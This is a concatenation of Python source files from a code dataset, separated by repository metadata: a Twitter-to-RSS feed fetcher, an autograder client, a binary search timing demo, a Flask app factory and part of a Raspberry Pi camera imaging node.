username = username_groups.group(1)
except IndexError:
return
return username
def fetch_user(self, username):
twitter_api = None
social_services = None
if self.options.get('requesting_user_id', None):
social_services = MSocialServices.get_user(self.options.get('requesting_user_id'))
try:
twitter_api = social_services.twitter_api()
except tweepy.error.TweepError, e:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: %s' %
(self.feed.log_title[:30], self.address, e))
return
else:
usersubs = UserSubscription.objects.filter(feed=self.feed)
if not usersubs:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: No subscriptions' %
(self.feed.log_title[:30], self.address))
return
for sub in usersubs:
social_services = MSocialServices.get_user(sub.user_id)
if not social_services.twitter_uid: continue
try:
twitter_api = social_services.twitter_api()
if not twitter_api:
continue
else:
break
except tweepy.error.TweepError, e:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: %s' %
(self.feed.log_title[:30], self.address, e))
continue
if not twitter_api:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed: %s: No twitter API for %s' %
(self.feed.log_title[:30], self.address, usersubs[0].user.username))
return
try:
twitter_user = twitter_api.get_user(username)
except TypeError, e:
logging.debug(u' ***> [%-30s] ~FRTwitter fetch failed, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: %s" % (e))
return
except tweepy.error.TweepError, e:
message = str(e).lower()
if ((len(e.args) >= 2 and e.args[2] == 63) or
('temporarily locked' in message)):
# Suspended
logging.debug(u' ***> [%-30s] ~FRTwitter failed, user suspended, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User suspended")
return
elif 'suspended' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user suspended, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User suspended")
return
elif 'expired token' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user expired, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: Expired token")
social_services.disconnect_twitter()
return
elif 'not found' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user not found, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User not found")
return
elif 'over capacity' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter over capacity, ignoring... %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(460, "Twitter Error: Over capacity")
return
else:
raise e
return twitter_user
def user_timeline(self, twitter_user):
try:
tweets = twitter_user.timeline(tweet_mode='extended')
except tweepy.error.TweepError, e:
message = str(e).lower()
if 'not authorized' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter timeline failed, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: Not authorized")
return []
elif 'user not found' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user not found, disconnecting twitter: %s: %s' %
(self.feed.log_title[:30], self.address, e))
self.feed.save_feed_history(560, "Twitter Error: User not found")
return []
elif 'blocked from viewing' in message:
logging.debug(u' ***> [%-30s] ~FRTwitter user blocked, ignoring: %s' %
(self.feed.log_title[:30], e))
self.feed.save_feed_history(560, "Twitter Error: Blocked from viewing")
return []
else:
raise e
if not tweets:
return []
return tweets
def tweet_story(self, user_tweet):
categories = set()
if user_tweet['full_text'].startswith('RT @'):
categories.add('retweet')
elif user_tweet['in_reply_to_status_id'] or user_tweet['full_text'].startswith('@'):
categories.add('reply')
else:
categories.add('tweet')
if user_tweet['full_text'].startswith('RT @'):
categories.add('retweet')
if user_tweet['favorite_count']:
categories.add('liked')
if user_tweet['retweet_count']:
categories.add('retweeted')
if 'http' in user_tweet['full_text']:
categories.add('link')
story = {}
content_tweet = user_tweet
entities = ""
author = user_tweet.get('author') or user_tweet.get('user')
if not isinstance(author, dict): author = author.__dict__
author_name = author['screen_name']
original_author_name = author_name
if user_tweet['in_reply_to_user_id'] == author['id']:
categories.add('reply-to-self')
retweet_author = ""
if 'retweeted_status' in user_tweet:
retweet_author = """Retweeted by
<a href="https://twitter.com/%s"><img src="%s" style="height: 20px" /></a>
<a href="https://twitter.com/%s">%s</a>
on %s""" % (
author_name,
author['profile_image_url_https'],
author_name,
author_name,
DateFormat(user_tweet['created_at']).format('l, F jS, Y g:ia').replace('.',''),
)
content_tweet = user_tweet['retweeted_status'].__dict__
author = content_tweet['author']
if not isinstance(author, dict): author = author.__dict__
author_name = author['screen_name']
tweet_title = user_tweet['full_text']
tweet_text = linebreaks(content_tweet['full_text'])
replaced = {}
entities_media = content_tweet['entities'].get('media', [])
if 'extended_entities' in content_tweet:
entities_media = content_tweet['extended_entities'].get('media', [])
for media in entities_media:
if 'media_url_https' not in media: continue
if media['type'] == 'photo':
if media.get('url') and media['url'] in tweet_text:
tweet_title = tweet_title.replace(media['url'], media['display_url'])
replacement = "<a href=\"%s\">%s</a>" % (media['expanded_url'], media['display_url'])
if not replaced.get(media['url']):
tweet_text = tweet_text.replace(media['url'], replacement)
replaced[media['url']] = True
entities += "<img src=\"%s\"> <hr>" % media['media_url_https']
if 'photo' not in categories:
categories.add('photo')
for url in content_tweet['entities'].get('urls', []):
if url['url'] in tweet_text:
replacement = "<a href=\"%s\">%s</a>" % (url['expanded_url'], url['display_url'])
if not replaced.get(url['url']):
tweet_text = tweet_text.replace(url['url'], replacement)
replaced[url['url']] = True
tweet_title = tweet_title.replace(url['url'], url['display_url'])
quote_tweet_content = ""
if 'quoted_status' in content_tweet:
quote_tweet_content = "<blockquote>"+self.tweet_story(content_tweet['quoted_status'])['description']+"</blockquote>"
created_date = content_tweet['created_at']
if isinstance(created_date, unicode):
created_date = dateutil.parser.parse(created_date)
content = """<div class="NB-twitter-rss">
<div class="NB-twitter-rss-tweet">%s</div>
<div class="NB-twitter-rss-quote-tweet">%s</div>
<hr />
<div class="NB-twitter-rss-entities">%s</div>
<div class="NB-twitter-rss-author">
Posted by
<a href="https://twitter.com/%s"><img src="%s" style="height: 32px" /></a>
<a href="https://twitter.com/%s">%s</a>
on %s</div>
<div class="NB-twitter-rss-retweet">%s</div>
<div class="NB-twitter-rss-stats">%s %s%s %s</div>
</div>""" % (
tweet_text,
quote_tweet_content,
entities,
author_name,
author['profile_image_url_https'],
author_name,
author_name,
DateFormat(created_date).format('l, F jS, Y g:ia').replace('.',''),
retweet_author,
("<br /><br />" if content_tweet['favorite_count'] or content_tweet['retweet_count'] else ""),
("<b>%s</b> %s" % (content_tweet['favorite_count'], "like" if content_tweet['favorite_count'] == 1 else "likes")) if content_tweet['favorite_count'] else "",
(", " if content_tweet['favorite_count'] and content_tweet['retweet_count'] else ""),
("<b>%s</b> %s" % (content_tweet['retweet_count'], "retweet" if content_tweet['retweet_count'] == 1 else "retweets")) if content_tweet['retweet_count'] else "",
)
story = {
'title': tweet_title,
'link': "https://twitter.com/%s/status/%s" % (original_author_name, user_tweet['id']),
'description': content,
'author_name': author_name,
'categories': list(categories),
'unique_id': "tweet:%s" % user_tweet['id'],
'pubdate': user_tweet['created_at'],
}
return story
```
|
{
"source": "jeffballard/ok",
"score": 3
}
|
#### File: ok/server/autograder.py
```python
import collections
import datetime
import enum
import json
import logging
import time
import oauthlib.common
import requests
from server import constants, jobs, utils
from server.models import User, Assignment, Backup, Client, Score, Token, db
logger = logging.getLogger(__name__)
def send_autograder(endpoint, data):
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(constants.AUTOGRADER_URL + endpoint,
data=json.dumps(data), headers=headers, timeout=8)
if r.status_code == requests.codes.ok:
if r.text == "OK": # e.g. when the token is "test"
return None
return r.json()
else:
error_message = 'The autograder rejected your request. {0}'.format(
r.text)
logger.debug('Autograder {} response: {}'.format(r.status_code,
error_message))
raise ValueError(error_message)
def create_autograder_token(user_id):
autograder_client = Client.query.get('autograder')
if not autograder_client:
autograder_client = Client(
name='Autograder',
client_id='autograder',
client_secret='autograder',
redirect_uris=[],
is_confidential=False,
description='The Autopy autograder system',
default_scopes=['all'],
)
db.session.add(autograder_client)
db.session.commit()
token = Token(
client=autograder_client,
user_id=user_id,
token_type='bearer',
access_token=oauthlib.common.generate_token(),
expires=datetime.datetime.utcnow() + datetime.timedelta(hours=2),
scopes=['all'],
)
db.session.add(token)
db.session.commit()
return token
def send_batch(token, assignment, backup_ids, priority='default'):
"""Send a batch of backups to the autograder, returning a dict mapping
backup ID -> autograder job ID.
"""
if not assignment.autograding_key:
raise ValueError('Assignment has no autograder key')
response_json = send_autograder('/api/ok/v3/grade/batch', {
'subm_ids': [utils.encode_id(bid) for bid in backup_ids],
'assignment': assignment.autograding_key,
'access_token': token.access_token,
'priority': priority,
'ok-server-version': 'v3',
})
if response_json:
return dict(zip(backup_ids, response_json['jobs']))
else:
return {}
def autograde_backup(token, assignment, backup_id):
"""Autograde a backup, returning and autograder job ID."""
jobs = send_batch(token, assignment, [backup_id], priority='high')
return jobs.get(backup_id)
def submit_continuous(backup):
""" Intended for continous grading (email with results on submit)
"""
email = backup.submitter.email
assignment = backup.assignment
file_contents = [b for b in backup.messages if b.kind == 'file_contents']
if not file_contents:
raise ValueError("No files to grade")
if not assignment.autograding_key:
raise ValueError("Not setup for autograding")
data = {
'assignment': assignment.autograding_key,
'file_contents': file_contents[0].contents,
'submitter': email,
'emails': [User.email_by_id(oid) for oid in backup.owners()]
}
if not backup.submitter.is_enrolled(assignment.course_id):
raise ValueError("User is not enrolled and cannot be autograded")
return send_autograder('/api/file/grade/continous', data)
def check_job_results(job_ids):
"""Given a list of autograder job IDs, return a dict mapping job IDs to
either null (if the job does not exist) of a dict with keys
status: one of 'queued', 'finished', 'failed', 'started', 'deferred'
result: string
"""
return send_autograder('/results', job_ids)
GradingStatus = enum.Enum('GradingStatus', [
'QUEUED', # a job is queued
'RUNNING', # a job is running
'WAITING', # the last job has finished, and we are waiting for a score
'DONE', # we have a score
'FAILED', # we could not get a score after several retries
])
class GradingTask:
def __init__(self, status, backup_id, job_id, retries):
self.status = status
self.backup_id = backup_id
self.job_id = job_id
self.retries = retries
self.status_change_time = time.time()
def set_status(self, status):
self.status = status
self.status_change_time = time.time()
def expired(self, timeout):
"""Returns True if it has been at least TIMEOUT seconds since the last
status change.
"""
return time.time() > self.status_change_time + timeout
MAX_RETRIES = 3 # maximum number of times to retry a score
QUEUED_TIMEOUT = 30 * 60 # maximum time or an autograder job to be queued for, in seconds
RUNNING_TIMEOUT = 5 * 60 # time to wait for an autograder job to run, in seconds
WAITING_TIMEOUT = 2 * 60 # time to wait for a score, in seconds
POLL_INTERVAL = 10 # how often to poll the autograder, in seconds
def autograde_backups(assignment, user_id, backup_ids, logger):
token = create_autograder_token(user_id)
start_time = time.time()
job_ids = send_batch(token, assignment, backup_ids)
tasks = [
GradingTask(
status=GradingStatus.QUEUED,
backup_id=backup_id,
job_id=job_id,
retries=0,
)
for backup_id, job_id in job_ids.items()
]
num_tasks = len(tasks)
def retry_task(task):
if task.retries >= MAX_RETRIES:
logger.error('Did not receive a score for backup {} after {} retries'.format(
utils.encode_id(task.backup_id), MAX_RETRIES))
task.set_status(GradingStatus.FAILED)
else:
task.set_status(GradingStatus.QUEUED)
task.job_id = autograde_backup(token, assignment, task.backup_id)
task.retries += 1
while True:
time.sleep(POLL_INTERVAL)
results = check_job_results([task.job_id for task in tasks])
graded = len([task for task in tasks
if task.status in (GradingStatus.DONE, GradingStatus.FAILED)])
logger.info('Graded {:>4}/{} ({:>5.1f}%)'.format(
graded, num_tasks, 100 * graded / num_tasks))
if graded == num_tasks:
break
for task in tasks:
hashid = utils.encode_id(task.backup_id)
if task.status == GradingStatus.QUEUED:
result = results[task.job_id]
if not result:
logger.warning('Autograder job {} for backup {} disappeared, retrying'.format(task.job_id, hashid))
retry_task(task)
elif result['status'] != 'queued':
logger.debug('Autograder job {} for backup {} started'.format(
task.job_id, hashid))
task.set_status(GradingStatus.RUNNING)
elif task.expired(QUEUED_TIMEOUT):
logger.warning('Autograder job {} for backup {} queued longer than {} seconds, retrying'.format(
task.job_id, hashid, QUEUED_TIMEOUT))
retry_task(task)
elif task.status == GradingStatus.RUNNING:
result = results[task.job_id]
if not result:
logger.warning('Autograder job {} for backup {} disappeared, retrying'.format(task.job_id, hashid))
retry_task(task)
elif result['status'] == 'finished':
logger.debug('Autograder job {} for backup {} finished'.format(
task.job_id, hashid))
task.set_status(GradingStatus.WAITING)
elif result['status'] == 'failed':
logger.warning('Autograder job {} for backup {} failed, retrying'.format(task.job_id, hashid))
retry_task(task)
elif task.expired(RUNNING_TIMEOUT):
logger.warning('Autograder job {} for backup {} running longer than {} seconds, retrying'.format(
task.job_id, hashid, RUNNING_TIMEOUT))
retry_task(task)
elif task.status == GradingStatus.WAITING:
score = Score.query.filter(
Score.backup_id == task.backup_id,
Score.archived == False,
Score.created > datetime.datetime.fromtimestamp(start_time)
).first()
if score:
logger.debug('Received score for backup {}'.format(hashid))
task.set_status(GradingStatus.DONE)
elif task.expired(WAITING_TIMEOUT):
logger.warning('Did not receive score for backup {} in {} seconds, retrying'.format(
hashid, WAITING_TIMEOUT))
retry_task(task)
# report summary
statuses = collections.Counter(task.status for task in tasks)
message = '{} graded, {} failed'.format(
statuses[GradingStatus.DONE], statuses[GradingStatus.FAILED])
logger.info(message)
@jobs.background_job
def autograde_assignment(assignment_id):
"""Autograde all enrolled students for this assignment.
We set up a state machine for each backup to check its progress through
the autograder. If any step takes too long, we'll retry autograding that
backup. Ultimately, a backup is considered done when we confirm that
we've received a new score, or if we have reached the retry limit.
"""
logger = jobs.get_job_logger()
assignment = Assignment.query.get(assignment_id)
course_submissions = assignment.course_submissions(include_empty=False)
backup_ids = set(fs['backup']['id'] for fs in course_submissions if fs['backup'])
try:
autograde_backups(assignment, jobs.get_current_job().user_id, backup_ids, logger)
except ValueError:
logger.info('Could not autograde backups - Please add an autograding key.')
return
return '/admin/course/{cid}/assignments/{aid}/scores'.format(
cid=jobs.get_current_job().course_id, aid=assignment.id)
```
|
{
"source": "jeffbarnette/Binary-Search",
"score": 4
}
|
#### File: jeffbarnette/Binary-Search/binary_search.py
```python
import random
import time
# Naive Search Algorithm
def naive_search(l, target):
# example l = [1, 3, 10, 12]
for i in range(len(l)):
if l[i] == target:
return i
return -1
# Binary Search Algorithm (Divide and Conquer)
def binary_search(l, target, low=None, high=None):
if low is None:
low = 0
if high is None:
high = len(l) - 1
if high < low:
return - 1
# example l = [1, 3, 5, 10, 12]
midpoint = (low + high) // 2
if l[midpoint] == target:
return midpoint
elif target < l[midpoint]:
return binary_search(l, target, low, midpoint - 1)
else:
# target > l[midpoint]
return binary_search(l, target, midpoint + 1, high)
if __name__ == '__main__':
# l = [1, 3, 5, 10, 12]
# target = 100
# print(naive_search(l, target))
# print(binary_search(l, target))
length = 50000
# Build a sorted list of length 50,000
sorted_list = set()
while len(sorted_list) < length:
sorted_list.add(random.randint(-3 * length, 3 * length))
sorted_list = sorted(list(sorted_list))
# Perform the searches and measure the time
print("")
start = time.time()
for target in sorted_list:
naive_search(sorted_list, target)
end = time.time()
print("Naive search time:", (end - start), "seconds.\n")
start = time.time()
for target in sorted_list:
binary_search(sorted_list, target)
end = time.time()
print("Binary search time:", (end - start), "seconds.\n")
```
|
{
"source": "jeffbarnette/MBTA-One-Stop",
"score": 3
}
|
#### File: MBTA-One-Stop/backend/app.py
```python
from flask import Flask
from flask_cors import CORS
from api.routes.main import main_api
def create_app():
app = Flask(__name__)
app.config["DEBUG"] = True
CORS(app)
# Default Path
@app.route('/', methods=['GET'])
def home():
return "<p>This service is working.</p>"
# API path
app.register_blueprint(main_api, url_prefix='/api')
return app
# This is being run from command line as the main application
if __name__ == '__main__':
from argparse import ArgumentParser
# Allow -p flag to overide the default port number
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
app = create_app()
app.run(host='127.0.0.1', port=port)
```
|
{
"source": "jeffbass/imagenode",
"score": 3
}
|
#### File: imagenode/tools/imaging.py
```python
import os
import sys
import yaml
import pprint
import signal
import logging
import itertools
import threading
import multiprocessing
from time import sleep
from datetime import datetime
from ast import literal_eval
from collections import deque
import numpy as np
import cv2
import imutils
from imutils.video import VideoStream
import zmq # needed to use zmq.LINGER in ImageNode.closall methods
import imagezmq
from tools.utils import interval_timer
from tools.nodehealth import HealthMonitor
from tools.utils import versionCompare
from pkg_resources import require
class ImageNode:
""" Contains all the attributes and methods of this imagenode
One ImageNode is instantiated during the startup of the imagenode.py
program. It takes the settings loaded from the YAML file and sets all
the operational parameters of the imagenode, including the hub address that
images and messages will be sent to, camera settings, sensors, etc. as
attributes of the ImageNode.
The ImageNode also contains all the methods to gather, process and send
images, event detection messages and sensor data to the ImageHub.
Parameters:
settings (Settings object): settings object created from YAML file
"""
def __init__(self, settings):
# set various node attributes; also check that numpy and OpenCV are OK
self.tiny_image = np.zeros((3, 3), dtype="uint8") # tiny blank image
ret_code, jpg_buffer = cv2.imencode(
".jpg", self.tiny_image, [int(cv2.IMWRITE_JPEG_QUALITY), 95])
self.tiny_jpg = jpg_buffer # matching tiny blank jpeg
self.jpeg_quality = 95
self.pid = os.getpid() # get process ID of this program
# open ZMQ link to imagehub
self.sender = imagezmq.ImageSender(connect_to=settings.hub_address)
self.sender.zmq_socket.setsockopt(zmq.LINGER, 0) # prevents ZMQ hang on exit
# If settings.REP_watcher is True, pick the send_frame function
# that does time recording of each REQ and REP. Start REP_watcher
# thread. Set up deques to track REQ and REP times.
self.patience = settings.patience # how long to wait in seconds
if settings.send_type == 'image': # set send function to image
if settings.REP_watcher:
self.send_frame = self.send_image_frame_REP_watcher
else:
self.send_frame = self.send_image_frame
else: # anything not spelled 'image' sets send function to jpg
if settings.REP_watcher:
self.send_frame = self.send_jpg_frame_REP_watcher
else:
self.send_frame = self.send_jpg_frame
if settings.REP_watcher: # set up deques & start thread to watch for REP
threading.Thread(daemon=True, target=self.REP_watcher).start()
self.REQ_sent_time = deque(maxlen=1)
self.REP_recd_time = deque(maxlen=1)
# set up message queue to hold (text, image) messages to be sent to hub
if settings.send_threading: # use a threaded send_q sender instead
self.send_q = SendQueue(maxlen=settings.queuemax,
send_frame=self.send_frame,
process_hub_reply=self.process_hub_reply)
self.send_q.start()
else:
self.send_q = deque(maxlen=settings.queuemax)
# start system health monitoring & get system type (RPi vs Mac etc)
self.health = HealthMonitor(settings, self.send_q)
self.sensors = [] # need an empty list even if no sensors
self.lights = []
if self.health.sys_type == 'RPi': # set up GPIO & sensors
if settings.sensors or settings.lights:
global GPIO
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
if settings.sensors: # is there at least one sensor in yaml file
self.setup_sensors(settings)
if settings.lights: # is there at least one light in yaml file
self.setup_lights(settings)
# set up and start camera(s)
self.camlist = [] # need an empty list if there are no cameras
if settings.cameras: # is there at least one camera in yaml file
self.setup_cameras(settings)
# Read a test image from each camera to check and verify:
# 1. test that all cameras can successfully read an image
# 2. determine actual camera resolution from returned image size
# 3. if resize_width has been set, test that it works without error
# 4. for each detector, convert roi_pct to roi_pixels
# Note that image size returned from reading the camera can vary from
# requested resolution size, especially in webcams
for camera in self.camlist:
testimage = camera.cam.read()
image_size = testimage.shape # actual image_size from this camera
width, height = image_size[1], image_size[0]
camera.res_actual = (width, height)
if camera.resize_width:
camera.width_pixels = (width * camera.resize_width) // 100
testimage = imutils.resize(testimage, width=camera.width_pixels)
image_size = testimage.shape
width, height = image_size[1], image_size[0]
else:
camera.width_pixels = width
camera.res_resized = (width, height)
# compute ROI in pixels using roi_pct and current image size
for detector in camera.detectors:
top_left_x = detector.roi_pct[0][0] * width // 100
top_left_y = detector.roi_pct[0][1] * height // 100
bottom_right_x = detector.roi_pct[1][0] * width // 100
bottom_right_y = detector.roi_pct[1][1] * height // 100
detector.top_left = (top_left_x, top_left_y)
detector.bottom_right = (bottom_right_x, bottom_right_y)
detector.roi_pixels = (detector.top_left, detector.bottom_right)
detector.roi_area = ((bottom_right_x - top_left_x)
* (bottom_right_y - top_left_y))
if detector.detector_type == 'motion':
detector.min_area_pixels = (detector.roi_area
* detector.min_area) // 100
# location of timestamp based on image size
if detector.draw_time:
time_x = detector.draw_time_org[0] * width // 100
time_y = detector.draw_time_org[1] * height // 100
detector.draw_time_org = (time_x, time_y)
if settings.print_node:
self.print_node_details(settings)
# send an imagenode startup event message with system values
text = '|'.join([settings.nodename,
'Restart',
self.health.hostname,
self.health.sys_type,
self.health.ipaddress,
self.health.ram_size,
self.health.time_since_restart])
text_and_image = (text, self.tiny_image)
self.send_q.append(text_and_image)
def print_node_details(self, settings):
print('Node details after setup and camera test read:')
print(' Node name:', settings.nodename)
print(' System Type:', self.health.sys_type)
for cam in self.camlist:
print(' Camera:', cam.cam_type)
print(' Resolution requested:', cam.resolution)
print(' Resolution actual after cam read:', cam.res_actual)
print(' Resize_width setting:', cam.resize_width)
print(' Resolution after resizing:', cam.res_resized)
if cam.cam_type == 'PiCamera':
# check picamera version
try:
picamversion = require('picamera')[0].version
except:
picamversion = '0'
print(' PiCamera:')
# awb_mode: off, auto, sunlight, cloudy, shade, tungsten, fluorescent, incandescent, flash, horizon
print(' awb_mode:', cam.cam.camera.awb_mode, '(default = auto)')
print(' brightness:', cam.cam.camera.brightness, '(default = 50, integer between 0 and 100)')
print(' contrast:', cam.cam.camera.contrast, '(default = 0, integer between -100 and 100)')
# exposure_compensation: integer value between -25 and 25
print(' exposure_compensation:', cam.cam.camera.exposure_compensation, '(default = 0)')
# exposure_mode: - off, auto, night, nightpreview, backlight, spotlight, sports, snow, beach, verylong,
# fixedfps, antishake, fireworks
print(' exposure_mode:', cam.cam.camera.exposure_mode, '(default = auto)')
print(' framerate:', cam.cam.camera.framerate, '(default = 30)')
print(' iso:', cam.cam.camera.iso, '(default = 0 for auto - 0,100,200,320,400,500,640,800)')
# meter_mode: average, spot, backlit, matrix
print(' meter_mode:', cam.cam.camera.meter_mode, '(default = average)')
print(' saturation:', cam.cam.camera.saturation, '(default = 0, integer between -100 and 100)')
print(' sharpness:', cam.cam.camera.sharpness, '(default = 0, integer between -100 and 100)')
print(' shutter_speed:', cam.cam.camera.shutter_speed, '(microseconds - default = 0 for auto)')
if versionCompare('1.6', picamversion) != 1:
print(' analog_gain:', float(cam.cam.camera.analog_gain), '(read-only)')
# awb_gains: typical values for the gains are between 0.9 and 1.9 - when awb_mode = off
print(' awb_gains:', cam.cam.camera.awb_gains)
print(' digital_gain:', float(cam.cam.camera.digital_gain), '(read-only)')
print(' exposure_speed:', cam.cam.camera.exposure_speed, '(microseconds - read-only)')
if versionCompare('1.13', picamversion) != 1:
print(' revision:', cam.cam.camera.revision, '(ov5647 = V1, imx219 = V2, imx477 = HQ)')
for detector in cam.detectors:
print(' Detector:', detector.detector_type)
print(' ROI:', detector.roi_pct, '(in percents)')
print(' ROI:', detector.roi_pixels, '(in pixels)')
print(' ROI area:', detector.roi_area, '(in pixels)')
print(' ROI name:', detector.roi_name)
print(' send_test_images:', detector.send_test_images)
print(' send_count:', detector.send_count)
if detector.detector_type == 'light':
print(' threshold:', detector.threshold)
print(' min_frames:', detector.min_frames)
elif detector.detector_type == 'motion':
print(' delta_threshold:', detector.delta_threshold)
print(' min_motion_frames:', detector.min_motion_frames)
print(' min_still_frames:', detector.min_still_frames)
print(' min_area:', detector.min_area, '(in percent)')
print(' min_area:', detector.min_area_pixels, '(in pixels)')
print(' blur_kernel_size:', detector.blur_kernel_size)
print(' print_still_frames:', detector.print_still_frames)
print()
def setup_sensors(self, settings):
""" Create a list of sensors from the sensors section of the yaml file
Typical sensors include temperature and humidity, but PIR motion
detectors, light meters and other are possible
Parameters:
settings (Settings object): settings object created from YAML file
"""
for sensor in settings.sensors: # for each sensor listed in yaml file
s = Sensor(sensor, settings.sensors, settings, self.tiny_image,
self.send_q)
self.sensors.append(s) # add it to the list of sensors
def setup_lights(self, settings):
""" Create a list of lights from the lights section of the yaml file
Lights are controlled by the RPI GPIO pins. The light settings name
each light and assign it a GPIO pin
Parameters:
settings (Settings object): settings object created from YAML file
"""
for light in settings.lights: # for each light listed in yaml file
lst = Light(light, settings.lights, settings) # create a Light instance with settings
self.lights.append(lst) # add it to the list of lights
def setup_cameras(self, settings):
""" Create a list of cameras from the cameras section of the yaml file
Often, the list will contain a single PiCamera, but it could be a
PiCamera with one or more webcams. Or one or more webcams with no
PiCamera.
Parameters:
settings (Settings object): settings object created from YAML file
"""
for camera in settings.cameras: # for each camera listed in yaml file
cam = Camera(camera, settings.cameras, settings) # create a Camera instance
self.camlist.append(cam) # add it to the list of cameras
def REP_watcher(self):
""" checks that a REP was received after a REQ; fix_comm_link() if not
When running in production, watching for a stalled ZMQ channel is required.
The REP_watcher yaml option enables checking that REP is received after REQ.
Runs in a thread; both REQ_sent_time & REP_recd_time are deque(maxlen=1).
Although REPs and REQs can be filling the deques continuously in the main
thread, we only need to occasionally check recent REQ / REP times. When
we have not received a timely REP after a REQ, we have a broken ZMQ
communications channel and call self.fix_comm_link().
"""
while True:
sleep(self.patience) # how often to check
try:
recent_REQ_sent_time = self.REQ_sent_time.popleft()
# if we got here; we have a recent_REQ_sent_time
sleep(1.0) # allow time for receipt of a REP
try:
recent_REP_recd_time = self.REP_recd_time.popleft()
except IndexError: # there was a REQ, but no REP was received
self.fix_comm_link()
# if we got here; we have a recent_REP_recd_time
interval = recent_REP_recd_time - recent_REQ_sent_time
if interval.total_seconds() <= 0.0:
# recent_REP_recd_time is not later than recent_REQ_sent_time
self.fix_comm_link()
except IndexError: # there wasn't a time in REQ_sent_time
# so there is no REP expected,
# ... so continue to loop until there is a time in REQ_sent_time
pass
def send_jpg_frame(self, text, image):
""" Compresses image as jpg before sending
Function self.send_frame() is set to this function if jpg option chosen
"""
ret_code, jpg_buffer = cv2.imencode(".jpg", image,
[int(cv2.IMWRITE_JPEG_QUALITY),
self.jpeg_quality])
hub_reply = self.sender.send_jpg(text, jpg_buffer)
return hub_reply
def send_image_frame(self, text, image):
""" Sends image as unchanged OpenCV image; no compression
Function self.send_frame() is set to this function if image option chosen
"""
hub_reply = self.sender.send_image(text, image)
return hub_reply
def send_jpg_frame_REP_watcher(self, text, image):
""" Compresses image as jpg before sending; sends with RPI_watcher deques
Function self.send_frame() is set to this function if jpg option chosen
and if REP_watcher option is True. For each (text, jpg_buffer) that is
sent, the current time is appended to a deque before and after the send.
This allows comparing times to check if a REP has been received after
the (text, jpg_buffer) REQ has been set. See self.REP_watcher() method
for details.
"""
ret_code, jpg_buffer = cv2.imencode(
".jpg", image, [int(cv2.IMWRITE_JPEG_QUALITY),
self.jpeg_quality])
self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now
try:
hub_reply = self.sender.send_jpg(text, jpg_buffer)
except: # add more specific exception, e.g. ZMQError, after testing
print("Exception at sender.send_jpg in REP_watcher function.")
self. fix_comm_link()
self.REP_recd_time.append(datetime.utcnow())
return hub_reply
def send_image_frame_REP_watcher(self, text, image):
""" Sends uncompressed OpenCV image; sends with RPI_watcher deques
Function self.send_frame() is set to this function if image option chosen
and if REP_watcher option is True. For each (text, jpg_buffer) that is
sent, the current time is appended to a deque before and after the send.
This allows comparing times to check if a REP has been received after
the (text, jpg_buffer) REQ has been set. See self.REP_watcher() method
for details.
"""
self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now
try:
hub_reply = self.sender.send_image(text, image)
except: # add more specific exception, e.g. ZMQError, after testing
print("Exception at sender.send_image in REP_watcher function.")
self. fix_comm_link()
self.REP_recd_time.append(datetime.utcnow())
return hub_reply
def read_cameras(self):
""" Read one image from each camera and run detectors.
Perform vflip and image resizing if requested in YAML setttings file.
Append transformed image to cam_q queue.
"""
for camera in self.camlist:
image = camera.cam.read()
if camera.vflip:
image = cv2.flip(image, -1)
if camera.resize_width:
image = imutils.resize(image, width=camera.width_pixels)
camera.cam_q.append(image)
for detector in camera.detectors:
self.run_detector(camera, image, detector)
def run_detector(self, camera, image, detector):
""" run detector on newest image and detector queue; perform detection
For each detector, add most recently acquired image to detector queue.
Apply detector critera to detector queue of images to evaluate events.
Append messages about events detected, if any, to send_q queue. Also,
append any images relevant to a detected event to send_q queue.
Parameters:
camera (Camera object): current camera
image (openCV image): most recently acquired camera image
detector (Detector object): current detector to apply to image
queue (e.g. motion)
"""
if detector.draw_roi:
cv2.rectangle(image,
detector.top_left,
detector.bottom_right,
detector.draw_color,
detector.draw_line_width)
# For troubleshooting purposes - print time on images
if detector.draw_time:
display_time = datetime.now().isoformat(sep=' ', timespec='microseconds')
cv2.putText(image,
display_time,
detector.draw_time_org,
cv2.FONT_HERSHEY_SIMPLEX,
detector.draw_time_fontScale,
detector.draw_time_color,
detector.draw_time_width,
cv2.LINE_AA)
# detect state (light, etc.) and put images and events into send_q
detector.detect_state(camera, image, self.send_q)
def fix_comm_link(self):
""" Evaluate, repair and restart communications link with hub.
Perhaps in future: Close and restart imageZMQ if possible, else restart
program or reboot computer.
For now, just call a function that will cause imagenode.py to exit.
"""
self.shutdown_imagenode()
sys.exit()
def shutdown_imagenode(self):
""" Start a process that shuts down the imagenode.py program.
It is very difficult to shutdown the imagenode.py program from
within a thread since sys.exit() only exits the thread. And most other
techniques that will end a program immediately don't close resources
appropriately. But creating a subprocess that kills the imagenode.py
parent process works cleanly. There really should be an easier way to
end a Python program from a thread, but after lots of searching, this
works. And, yes, it is messy. Please find a better one and send a
pull request!
"""
multiprocessing.Process(daemon=True,
args=((self.pid,)),
target=self.shutdown_process_by_pid).start()
sys.exit()
